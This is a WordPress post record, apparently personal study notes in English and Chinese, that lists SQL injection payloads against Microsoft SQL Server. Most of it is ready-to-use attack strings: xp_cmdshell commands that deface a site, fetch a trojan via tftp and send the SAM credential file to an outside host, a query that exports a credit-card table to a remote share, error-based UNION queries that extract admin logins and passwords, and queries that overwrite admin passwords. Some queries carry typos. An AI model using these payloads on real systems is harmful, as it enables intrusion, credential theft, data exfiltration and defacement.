{"id":445,"date":"2020-08-03T22:27:00","date_gmt":"2020-08-03T14:27:00","guid":{"rendered":"http:\/\/note.systw.net\/note\/?p=445"},"modified":"2024-02-17T20:21:13","modified_gmt":"2024-02-17T12:21:13","slug":"sql-injection-example-for-windows","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/445","title":{"rendered":"SQL injection example for windows"},"content":{"rendered":"\n

using sql server stored procedures<\/strong><\/p>\n\n\n\n

…<\/p>\n\n\n\n

executing operating system commands<\/strong>
\u4f7f\u7528stored procedures such as master..xp_cmdshell
\u8a9e\u6cd5\u5982\u4e0b
blah' ; exec master..xp_cmdshell \"insert os command\"<\/code>
ps:\u82e5single quote\u7121\u6cd5\u904b\u4f5c\u53ef\u4f7f\u7528double quote<\/p>\n\n\n\n

ex:\nping a server\nblah' ; exec master..xp_cmdshell \"ping 10.1.2.3\" --\nlist the directory file\nblah' ; exec master..xp_cmdshell \"dir c:*.*\/s > c:\\directory.txt\" --\ncreate a file\nblah' ; exec master..xp_cmdshell \"echo hello > c:\\hello.txt\" --\ndefacing a web page\nblah' ; exec master..xp_cmdshell \"echo you-are-defaced > c:\\inetpub\\www\\root\\index.htm\" --\nexecute non-gui applications\nblah' ; exec master..xp_cmdshell \"cmd.exe \/c appname.exe\" --\nupload a trojan to the server\nblah' ; exec master..xp_cmdshell \"tftp -i 10.1.2.3 GET trojan.exe c:\\trojan.exe\" --\ndownload a trojan to the server\nblah' ; exec master..xp_cmdshell \"tftp -i 10.1.2.1 PUT c:\\winnt\\repair\\SAM SAM\" --<\/code><\/pre>\n\n\n\n

…..<\/p>\n\n\n\n
use sp_makewebtask to write a query into an html<\/strong>
sp_makewebtask\u662fSQL Server \u5305\u542b\u4e00\u500bstored procedures
\u662f\u7528\u4f86\u5f97\u5230WebShell\u7684\uff0c\u4e3b\u8981\u529f\u80fd\u5c31\u662f\u5c0e\u51fa\u8cc7\u6599\u5eab\u4e2d\u8868\u7684\u8a18\u9304\u70ba\u6a94
\u8a9e\u6cd5\u5982\u4e0b:
blah' ; exec master..sp_makewebtask \"webpage\",\"sql command\"<\/code>
ex:
\u8f38\u51facreditcard table\u5230\u7db2\u9801
blah' ; exec master..sp_makewebtask \"\\\\10.10.1.4\\share\\creditcard.html\",\"select * from creditcard\"<\/code><\/p>\n\n\n\n
…..<\/p>\n\n\n\n
getting data from the database using odbc error message<\/strong>
\u4f7f\u7528\u7279\u6b8a\u7684sql query\u8feb\u4f7fMS SQL SERVER\u5f9e\u8fd4\u56de\u7684message\u4e2d\u5f97\u5230\u9700\u8981\u7684\u8cc7\u6599,\u5982table name,column name<\/p>\n\n\n\n
using UNION\u5b50\u53e5<\/strong>
\u8a9e\u6cd5\u5927\u81f4\u5982\u4e0b
http:\/\/web\/page.asp?var=value \"UNION subquery\"<\/code>
\u7cfb\u7d71\u6703\u7522\u751ferror message,\u4e26\u6839\u64daUNION subquery\u900f\u9732\u76f8\u95dc\u8cc7\u8a0a
\u64cd\u4f5c\u5927\u81f4\u5982\u4e0b
http:\/\/www.web.com\/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEM.TABLES-<\/code>
when the user UNIONS this string value to an integer 10,sql server makes an effort to convert a string(nvarchar)to an integer,thus it produces an error,since converting nvarchar to int is not possible.the server display the error
\u4f7f\u7528UNION\u5b50\u53e5\u5c07\u8acb\u6c42string value\u52a0\u5165integer 10,SQL SERVER\u6703\u5617\u8a66\u8f49\u63db\u8a72string\u70bainteger
\u82e5\u7121\u6cd5\u628a\u5b57\u7b26\u4e32(nvarchar)\u8f49\u70ba\u6574\u6578\u578b(int)\u6642\uff0c\u7cfb\u7d71\u5c31\u6703\u7522\u751f\u932f\u8aa4
\u7cfb\u7d71\u7522\u751f\u4ee5\u4e0b\u7684error message
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
\/index.asp, line 5<\/code>
\u6b64error message\u900f\u9732\u51fa\u7b2c\u4e00\u500btable name\u70batable1<\/p>\n\n\n\n

UNION subquery\u7bc4\u4f8b:<\/p>\n\n\n\n
\u8b93\u7cfb\u7d71\u5728\u900f\u9732\u51fa\u7b2c\u4e8c\u500btable name<\/strong>
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEM.TABLES WHERE TABLE_NAME NOT IN('table1')--<\/code>
\u7cfb\u7d71\u8f38\u51faerror message\u82e5\u51fa\u73fe…the nvarchar value ‘admin_name’ to a column … ,\u8868\u793atable name\u70baadmin_name<\/p>\n\n\n\n
\u4f7f\u7528like\u57f7\u884c\u4ee5\u4e0b\u8a9e\u6cd5\u53ef\u8b93\u7cfb\u7d71\u900f\u9732\u51fa\u542b login\u7684\u7b2c\u4e00\u500btable name<\/strong>
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEM.TABLES WHERE TABLE_NAME like '%25LOGIN%25'--<\/code>
\u7cfb\u7d71\u8f38\u51fa error message\u82e5\u51fa\u73fe…the nvarchar value ‘admin_login’ to a column… ,\u8868\u793atable name\u70baadmin_login<\/p>\n\n\n\n
\u8b93\u7cfb\u7d71\u900f\u9732\u51faadmin_login\u7684\u7b2c\u4e00\u500bcolumn<\/strong>
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--<\/code>
\u7cfb\u7d71\u8f38\u51faerror message\u82e5\u51fa\u73fe…the nvarchar value ‘login_id’ to a column …,\u8868\u793acolumn name\u70balogin_id<\/p>\n\n\n\n
\u8b93\u7cfb\u7d71\u900f\u9732\u51fa admin_login\u7684\u7b2c\u4e8c\u500bcolumn<\/strong>
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN('login_id')--<\/code>
\u7cfb\u7d71\u8f38\u51faerror message\u82e5\u51fa\u73fe…the nvarchar value ‘login_name’ to a column …,\u8868\u793acolumn name\u70balogin_name<\/p>\n\n\n\n
\u8b93\u7cfb\u7d71\u900f\u9732\u51faadmin_login\u8cc7\u6599\u8868\u7684login_name\u7684\u7b2c\u4e00\u500b\u503c<\/strong>
UNION SELECT TOP 1 login_name FROM admin_login --<\/code>
\u7cfb\u7d71\u8f38\u51faerror message\u82e5\u51fa\u73fe…the nvarchar value ‘ray’ to a column …,\u8868\u793alogin_name\u7b2c\u4e00\u500b\u503c\u70baray<\/p>\n\n\n\n
\u8b93\u7cfb\u7d71\u900f\u9732\u51faadmin_login\u8cc7\u6599\u8868\u7684 password\u7684\u503c,\u4e14login_name\u70baray<\/strong>
UNION SELECT TOP 1 password FROM admin_login where login_name='ray'--<\/code>
\u7cfb\u7d71\u8f38\u51faerror message\u82e5\u51fa\u73fe…the nvarchar value ‘ixtr3n’ to a column …,\u8868\u793aray\u7684password\u70baixtr3n<\/p>\n\n\n\n

ps:
INFORMATION_SCHEM.TABLES: contains information about all tables in the server
…..<\/p>\n\n\n\n
update\/insert date into database<\/strong>
\u8a9e\u6cd5\u5927\u81f4\u5982\u4e0b
http:\/\/web\/page.asp?var=value;\"update or insert sql query\"<\/code>
ex:
http:\/\/www.web.com\/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'goodjob' WHERE login_name='ray' --
http:\/\/www.web.com\/index.asp?id=10; INSERT INTO 'admin_login' ('login_id','loain_name','password') VALUES(123,'ray','goodjob') -<\/code>–<\/p>\n\n\n\n
………………………………………………………………………………………………..<\/p>\n\n\n\n
attacking sql servers<\/strong>
\u65b9\u6cd5\u6709
SSRS
Osql-l probe
sc.exe
port scanning
use of commercial alternatives<\/p>\n\n\n\n
…<\/p>\n\n\n\n
SSRS(sql server resolution service)<\/strong>
the service is responsible for sending a response packet containing the connection details of clients who send a specially formed request
the packet contains the details necessary to connect to the desired instance,including the tcp port
\u4f7f\u7528udp 1434<\/p>\n\n\n\n
SSRS buffer overflow vulnerabilities:<\/strong>
allow remote attackers to overwrite portions of system’s memory and execute arbitrary codes<\/p>\n\n\n\n
…<\/p>\n\n\n\n
Osql-l probe<\/strong>
a command-line utility provided by microsoft with sql server 2000
allow the user to issue queries to the server
\u7528\u9014:list servers<\/p>\n\n\n\n
…<\/p>\n\n\n\n
sc.exe<\/strong>
the server controller command makes it possible to query servers to see if they are offering sql server services
\u7528\u9014:sweeping of services,\u67e5\u8a62\u5c0d\u65b9\u662f\u5426\u70basql server<\/p>\n","protected":false},"excerpt":{"rendered":"
using sql server stored proced …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[38],"tags":[],"class_list":["post-445","post","type-post","status-publish","format-standard","hentry","category-serverside"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/445","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=445"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/445\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=445"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=445"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=445"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}